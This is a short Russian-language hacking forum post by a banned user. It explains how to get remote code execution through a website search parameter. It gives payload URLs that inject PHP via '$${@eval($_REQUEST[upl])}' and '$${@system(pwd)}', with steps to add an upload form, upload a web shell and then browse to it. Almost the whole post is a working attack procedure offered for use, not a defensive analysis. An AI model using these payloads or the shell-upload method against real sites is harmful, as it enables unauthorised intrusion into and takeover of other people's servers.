29.05.2015, 11:12
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
с RCE все просто: там фильтровались кавычки, но нам они и не нужны.
делаем запрос:
Код:
http://www.site.ru/search/?action=index&text=$${@eval($_REQUEST[upl])}
в код страницы вставляем форму для аплоада:
грузим шелл. смотрим текущую папку
Код:
http://www.site.ru/search/?action=index&text=$${@system(pwd)}
все, переходим по ссылке на шелл.
P. S. при создании темы делайте название более информативным |
|
|